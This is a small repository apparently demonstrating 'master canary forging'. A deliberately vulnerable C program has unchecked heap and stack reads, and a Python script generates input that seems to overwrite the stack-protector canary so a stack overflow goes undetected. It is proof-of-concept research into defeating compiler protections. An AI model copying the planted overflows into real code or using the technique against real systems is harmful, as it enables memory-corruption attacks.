├── README.md
├── a.out
├── exploit.py
└── poc.c


/README.md:
--------------------------------------------------------------------------------
1 | # MasterCanaryForging-PoC
2 | The environment where PoC was executed: 
3 |   - Ubuntu 15.04 amd64 vanilla
4 | 


--------------------------------------------------------------------------------
/a.out:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/potetisensei/MasterCanaryForging-PoC/fb6412ba4f3112d0fcc90cd22c4635b7fe2e9b1e/a.out


--------------------------------------------------------------------------------
/exploit.py:
--------------------------------------------------------------------------------
1 | print "{}".format(0x21000)
2 | print "{}".format(0x23720)
3 | print "a" * (0x23720+0x30)
4 | 


--------------------------------------------------------------------------------
/poc.c:
--------------------------------------------------------------------------------
 1 | /*
 2 |  *  gcc poc.c -fstack-protector-all -Wl,-z,now,-z,-relro
 3 |  */
 4 | 
 5 | #include <stdio.h>
 6 | #include <stdlib.h>
 7 | 
 8 | void stack_overflow(void) {
 9 |     char stack_buf[16];
10 | 
11 |     fread(stack_buf, 1, 48, stdin);
12 |     return;
13 | }
14 | 
15 | int main(void) {
16 |     size_t alloc_size = 0;
17 |     size_t read_size = 0;
18 |     char *heap_buf;
19 | 
20 |     if (scanf("%zu", &alloc_size) != 1) return -1;
21 |     if (scanf("%zu", &read_size) != 1) return -1;
22 | 
23 |     heap_buf = (char*)malloc(alloc_size);
24 |     if (!heap_buf) return -1;
25 | 
26 |     fread(heap_buf, sizeof(char), read_size, stdin);
27 |     stack_overflow();
28 |     free(heap_buf);
29 |     return 0;
30 | }
31 | 


--------------------------------------------------------------------------------